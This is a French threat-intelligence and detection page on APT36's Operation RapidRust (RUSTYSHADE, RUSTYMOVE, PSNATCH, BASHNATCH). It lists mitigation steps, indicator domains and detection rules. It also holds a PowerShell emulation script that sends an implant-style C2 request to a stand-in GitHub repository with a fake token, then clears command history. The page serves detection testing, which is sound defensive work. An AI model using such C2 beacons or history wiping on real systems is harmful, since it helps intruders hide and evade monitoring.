APT36 Lance l’Opération RapidRust avec RUSTYSHADE et RUSTYMOVE
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Le groupe de menace APT36 lié au Pakistan mène une campagne suivie sous le nom Opération RapidRust contre les organisations gouvernementales et de défense. Le groupe a introduit de nouveaux logiciels malveillants basés sur Rust, notamment la porte dérobée RUSTYSHADE et l’outil de propagation RUSTYMOVE. APT36 utilise également des scripts spécialisés pour voler des fichiers, PSNATCH et BASHNATCH, pour collecter et exfiltrer des données via des dépôts GitHub privés.
Investigation
Zscaler ThreatLabz a identifié de nouvelles familles de logiciels malveillants et des outils post-compromission utilisés par APT36 en août 2026. L’enquête a révélé que RUSTYSHADE abusait de l’API REST de GitHub pour le commandement et contrôle et utilisait des domaines typosquattés pour la mise en scène des charges utiles. Les chercheurs ont également observé des tentatives de mouvement latéral et RUSTYMOVE se propageant via des médias amovibles pour atteindre des environnements isolés.
Atténuation
Les organisations doivent surveiller l’utilisation non autorisée de l’API GitHub et les connexions sortantes inhabituelles vers des services de stockage cloud tels que Backblaze. Des contrôles stricts doivent être appliqués sur les supports amovibles, tandis que les tâches programmées suspectes se faisant passer pour des mises à jour légitimes doivent être détectées. La surveillance des points de terminaison doit également identifier l’exécution non autorisée de scripts PowerShell ou Bash et des activités inhabituelles d’exfiltration de fichiers.
Réponse
Si une activité malveillante est détectée, les points de terminaison Windows et Linux affectés doivent être isolés immédiatement pour prévenir le mouvement latéral et l’exfiltration de données. Les intervenants doivent inspecter les tâches programmées et rechercher des fichiers tels que DriverInstaller.zip or Automata-20.exe. Les journaux réseau doivent également être vérifiés pour des connexions à theprints[.]org, indiatodays[.]org, et une activité suspecte de l’API GitHub provenant de l’environnement.
Flux d’attaque
Nous mettons encore à jour cette partie.
Détections
Possibilité d’exécution via des lignes de commande PowerShell cachées (via cmdline)
Téléchargement ou envoi via Powershell (via cmdline)
Découverte possible de système distant ou vérification de connectivité (via cmdline)
Découverte possible de partages réseau (via cmdline)
Énumération possible de comptes ou de groupes Admin (via cmdline)
Découverte possible de configuration réseau système (via cmdline)
Exécution suspecte à partir d’un profil utilisateur public (via process_creation)
Création possible de tâche programmée (via powershell)
Tentative possible de communication de recherche de domaine IP (via dns)
IOC (HashSha256) à détecter : Opération RapidRust : APT36 déploie RUSTYSHADE, RUSTYMOVE, PSNATCH, et BASHNATCH
IOC (HashSha1) à détecter : Opération RapidRust : APT36 déploie RUSTYSHADE, RUSTYMOVE, PSNATCH, et BASHNATCH
IOC (HashMd5) à détecter : Opération RapidRust : APT36 déploie RUSTYSHADE, RUSTYMOVE, PSNATCH, et BASHNATCH
Communication C2 RUSTYSHADE via l’API GitHub [Connexion réseau Windows]
Détection d’activité RUSTYSHADE et RUSTYMOVE via PowerShell [Windows Powershell]
Exécution de simulation
-
Narration & Commandes de l’attaque : L’adversaire a réussi à déployer un implant de type RUSTYSHADE sur une station de travail Windows. Pour recevoir d’autres instructions, l’implant doit communiquer avec son C2 hébergé sur GitHub. L’implant tentera d’atteindre un dépôt spécifique pour récupérer une charge utile. Pour contourner les filtres périmétriques de base qui pourraient bloquer l’accès anonyme à l’API, l’implant utilise un jeton d’accès personnel (PAT) codé en dur passé via l’en-tête
Authorization: token <TOKEN>. Cette action est destinée à ressembler à un outil de développeur légitime récupérant des métadonnées de dépôt, mais la combinaison spécifique de l’URL du dépôt et du préfixetokendans l’en-tête déclenchera la règle de détection. -
Script de test de régression :
# Script de simulation pour imiter la communication C2 RUSTYSHADE # Ce script génère une requête qui correspond à la logique de détection : # 1. URL contient 'api.github.com/repos/' # 2. L'en-tête contient 'Authorization: token' $targetUrl = "https://api.github.com/repos/adversary-c2/malicious-repo/contents/config.json" $fakeToken = "ghp_sImUlAtEdToKeN1234567890AbCdEfGhIjKlMnOpQrStUvWxYz" # Construction de l'en-tête pour correspondre exactement à la chaîne 'token' requise par la règle $headers = @{ "Authorization" = "token $fakeToken" "User-Agent" = "RUSTYSHADE-Implant/1.0" } Write-Host "Tentative de communication C2 à $targetUrl..." try { # Nous utilisons -ErrorAction SilentlyContinue parce que l'URL est factice et renverra 404, # mais le proxy enregistrera toujours la tentative de requête. Invoke-WebRequest -Uri $targetUrl -Headers $headers -Method Get -ErrorAction SilentlyContinue Write-Host "Requête de simulation envoyée avec succès." } catch { Write-Host "Requête envoyée (Erreur attendue due à l'URL factice, mais les journaux proxy devraient capturer la tentative)." } -
Commandes de nettoyage :
# Aucune modification persistante n'a été faite au système; # cependant, nous effaçons l'historique des commandes pour la propreté. Clear-History